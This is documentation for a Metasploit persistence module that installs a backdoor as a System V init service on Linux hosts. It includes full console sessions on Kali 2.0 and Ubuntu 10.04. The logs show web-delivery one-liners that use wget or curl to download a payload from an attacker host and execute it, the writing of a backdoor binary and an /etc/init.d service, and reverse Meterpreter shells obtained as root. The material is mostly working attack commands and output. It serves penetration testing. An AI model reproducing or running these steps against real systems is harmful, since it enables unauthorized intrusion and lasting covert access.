Path: blob/master/documentation/modules/exploit/linux/persistence/init_sysvinit.md
24441 views
Vulnerable Application
This module will create a service via System V on the box, and mark it for auto-restart. We need enough access to write service files and potentially restart services.
Some systems include backwards compatibility, such as Ubuntu up to about 16.04.
Targets:
CentOS <= 5
Debian <= 6
Kali 2.0
Ubuntu <= 6.06
Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.
Verified on Kali 2.0 and Ubuntu 10.04
Verification Steps
Exploit a box
use exploit/linux/persistence/init_sysvinitset SESSION <session>set PAYLOAD <payload>set LHOST <lhost>exploit
Options
SERVICE
The name of the service to create. If not chosen, a random one is created.
PAYLOAD_NAME
The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.
EnableService
If the service should be enabled. Defaults to true
Scenarios
Kali 2.0
Initial access vector via web delivery
resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111 lhost => 111.111.1.111 resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set srvport 8181 srvport => 8181 resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4545 lport => 4545 resource (/root/.msf4/msfconsole.rc)> set URIPATH l URIPATH => l resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Starting persistent handler(s)... [*] Started reverse TCP handler on 111.111.1.111:4545 [*] Using URL: http://111.111.1.111:8181/l [*] Server started. [*] Run the following command on the target machine: wget -qO 1KkF4s8n --no-check-certificate http://111.111.1.111:8181/l; chmod +x 1KkF4s8n; ./1KkF4s8n& disown [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 222.222.2.22 [*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:56459) at 2025-02-16 07:51:56 -0500 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... (Meterpreter 1)(/root) > getuid Server username: root (Meterpreter 1)(/root) > sysinfo Computer : kali2.0 OS : Kali 2.0 (Linux 4.0.0-kali1-amd64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux (Meterpreter 1)(/root) > background [*] Backgrounding session 1...
Persistence
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_sysvinit [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp [msf](Jobs:1 Agents:1) exploit(linux/persistence/init_sysvinit) > set session 1 session => 1 [msf](Jobs:1 Agents:1) exploit(linux/persistence/init_sysvinit) > exploit [*] Command to run on remote host: curl -so ./BQVXqXpLiG http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./BQVXqXpLiG;./BQVXqXpLiG& [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [msf](Jobs:2 Agents:1) exploit(linux/persistence/init_sysvinit) > [*] Fetch handler listening on 111.111.1.111:8080 [*] HTTP server started [*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] Payloads in /tmp will only last until reboot, you want to choose elsewhere. [+] The target appears to be vulnerable. /tmp/ is writable and system is System V based [*] Writing backdoor to /tmp//MarxU [*] Utilizing update-rc.d [*] Writing service: /etc/init.d/JIxbnwyUcQ [+] Enabling & starting our service [*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg [*] Sending payload to 222.222.2.22 (curl/7.38.0) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to 222.222.2.22 [*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:55807) at 2025-02-16 07:56:21 -0500 [*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/kali2.0_20250216.5622/kali2.0_20250216.5622.rc
Ubuntu 10.04
Initial Access
[*] Processing /root/.msf4/msfconsole.rc for ERB directives. resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 7 target => 7 resource (/root/.msf4/msfconsole.rc)> set srvport 8082 srvport => 8082 resource (/root/.msf4/msfconsole.rc)> set uripath l uripath => l resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4446 lport => 4446 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4446 [*] Using URL: http://1.1.1.1:8082/l [*] Server started. [*] Run the following command on the target machine: wget -qO USCPscnY --no-check-certificate http://1.1.1.1:8082/l; chmod +x USCPscnY; ./USCPscnY& disown msf exploit(multi/script/web_delivery) > msf exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:34107) at 2025-10-14 19:25:56 -0400
Persistence
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_sysvinit [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(linux/persistence/init_sysvinit) > set session 1 session => 1 msf exploit(linux/persistence/init_sysvinit) > set fetch_command wget fetch_command => wget msf exploit(linux/persistence/init_sysvinit) > exploit [*] Command to run on remote host: wget -qO ./udAHcvdgUY http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./udAHcvdgUY;./udAHcvdgUY& [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /t70WmtC4mNeBieRpZqn09Q [*] Started reverse TCP handler on 1.1.1.1:4444 msf exploit(linux/persistence/init_sysvinit) > [*] Running automatic check ("set AutoCheck false" to disable) [!] Payloads in /tmp will only last until reboot, you want to choose elsewhere. [+] The target appears to be vulnerable. /tmp/ is writable and system is System V based [*] Writing backdoor to /tmp//WwOLntsn [*] Utilizing update-rc.d [*] Writing service: /etc/init.d/YdLNVodgv [+] Enabling & starting our service (10 second delay for payload) [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu10.04_20251014.2751/ubuntu10.04_20251014.2751.rc [*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q [*] Sending payload to 2.2.2.2 (Wget/1.12 (linux-gnu)) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:59491) at 2025-10-14 19:28:01 -0400 msf exploit(linux/persistence/init_sysvinit) > sessions -i 2 [*] Starting interaction with 2... meterpreter > sysinfo Computer : ubuntu10.04 OS : Ubuntu 10.04 (Linux 2.6.32-21-server) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > getuid Server username: root